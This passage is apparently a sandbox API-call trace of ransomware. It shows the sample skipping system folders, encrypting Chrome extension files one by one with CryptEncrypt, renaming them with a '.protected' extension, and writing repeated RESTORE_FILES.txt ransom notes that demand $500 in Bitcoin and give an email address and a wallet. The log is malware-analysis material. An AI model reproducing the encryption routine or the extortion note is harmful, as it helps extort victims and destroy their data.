pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\zh_CN") returned 145 [0079.630] lstrcmpW (lpString1="zh_CN", lpString2=".") returned 1 [0079.630] lstrcmpW (lpString1="zh_CN", lpString2="..") returned 1 [0079.631] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\zh_CN\\*") returned 147 [0079.631] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\zh_CN\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 
[0079.631] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0079.631] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0079.631] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0079.631] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0079.631] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0079.631] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\zh_CN\\.") returned 147 [0079.631] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0079.631] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0079.631] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0079.631] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0079.631] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0079.631] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0079.631] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0079.631] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\zh_CN\\..") returned 148 [0079.631] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0079.631] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0079.631] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0079.631] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0079.631] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0079.631] lstrcmpiW (lpString1="messages.json", lpString2="Program 
Files (x86)") returned -1 [0079.631] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0079.631] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0079.631] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\zh_CN\\messages.json") returned 159 [0079.631] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0079.631] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0079.631] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0079.631] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0079.631] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\zh_CN\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\zh_cn\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0079.632] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\zh_CN\\messages.json") returned 159 [0079.632] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0079.632] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\zh_CN\\messages.json") returned 159 [0079.632] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0079.632] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\zh_CN\\messages.json") returned 159 [0079.632] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0079.632] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0x111, lpOverlapped=0x0) returned 1 [0079.633] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xfffffeef, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0079.633] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0x111, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0x111, lpOverlapped=0x0) returned 1 [0079.633] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0079.633] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0079.633] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0079.633] CloseHandle (hObject=0x168) returned 1 [0079.634] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\zh_CN\\messages.json.protected") returned 169 [0079.634] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\zh_CN\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\zh_cn\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\zh_CN\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\zh_cn\\messages.json.protected")) returned 1 [0079.634] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0079.634] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0079.635] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\zh_CN\\RESTORE_FILES.txt") returned 163 [0079.635] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\zh_CN\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\zh_cn\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 
0x164 [0079.635] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0079.635] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0079.636] lstrlenA (lpString="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") returned 684 [0079.636] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, 
lpOverlapped=0x0) returned 1 [0079.636] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0079.636] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0079.636] CloseHandle (hObject=0x164) returned 1 [0079.636] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0079.636] lstrcmpiW (lpString1="zh_TW", lpString2="Windows") returned 1 [0079.636] lstrcmpiW (lpString1="zh_TW", lpString2="Program Files") returned 1 [0079.636] lstrcmpiW (lpString1="zh_TW", lpString2="Program Files (x86)") returned 1 [0079.636] lstrcmpiW (lpString1="zh_TW", lpString2="$Recycle.bin") returned 1 [0079.636] lstrcmpiW (lpString1="zh_TW", lpString2="System Volume Information") returned 1 [0079.636] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\zh_TW") returned 145 [0079.636] lstrcmpW (lpString1="zh_TW", lpString2=".") returned 1 [0079.636] lstrcmpW (lpString1="zh_TW", lpString2="..") returned 1 [0079.636] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\zh_TW\\*") returned 147 [0079.636] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\zh_TW\\*", lpFindFileData=0x295d930 | out: 
lpFindFileData=0x295d930) returned 0x47bc10 [0079.636] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0079.637] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0079.637] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0079.637] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0079.637] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0079.637] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\zh_TW\\.") returned 147 [0079.637] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0079.637] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0079.637] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0079.637] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0079.637] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0079.637] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0079.637] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0079.637] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\zh_TW\\..") returned 148 [0079.637] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0079.637] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0079.637] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0079.637] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0079.637] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0079.637] lstrcmpiW 
(lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0079.637] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0079.637] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0079.637] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\zh_TW\\messages.json") returned 159 [0079.637] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0079.637] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0079.637] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0079.637] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0079.637] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\zh_TW\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\zh_tw\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0079.638] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\zh_TW\\messages.json") returned 159 [0079.638] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0079.638] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\zh_TW\\messages.json") returned 159 [0079.638] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0079.638] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\zh_TW\\messages.json") returned 159 [0079.638] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0079.638] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0x10b, lpOverlapped=0x0) returned 1 [0079.638] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xfffffef5, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0079.639] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0x10b, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0x10b, lpOverlapped=0x0) returned 1 [0079.639] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0079.639] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0079.639] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0079.639] CloseHandle (hObject=0x168) returned 1 [0079.639] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\zh_TW\\messages.json.protected") returned 169 [0079.639] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\zh_TW\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\zh_tw\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\zh_TW\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\zh_tw\\messages.json.protected")) returned 1 [0079.640] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0079.640] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0079.640] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\zh_TW\\RESTORE_FILES.txt") returned 163 [0079.640] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\zh_TW\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\zh_tw\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 
0x164 [0079.640] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0079.640] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0079.641] lstrlenA (lpString="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") returned 684 [0079.641] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, 
lpOverlapped=0x0) returned 1 [0079.641] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0079.641] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0079.641] CloseHandle (hObject=0x164) returned 1 [0079.641] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 0 [0079.641] FindClose (in: hFindFile=0x47bbd0 | out: hFindFile=0x47bbd0) returned 1 [0079.641] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\RESTORE_FILES.txt") returned 157 [0079.641] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x160 [0079.645] lstrlenA (lpString="! 
SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0079.645] WriteFile (in: hFile=0x160, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295db84, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295db84*=0x53d, lpOverlapped=0x0) returned 1 [0079.646] lstrlenA (lpString="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") returned 684 [0079.646] WriteFile (in: hFile=0x160, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295db84, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295db84*=0x2ac, lpOverlapped=0x0) returned 1 
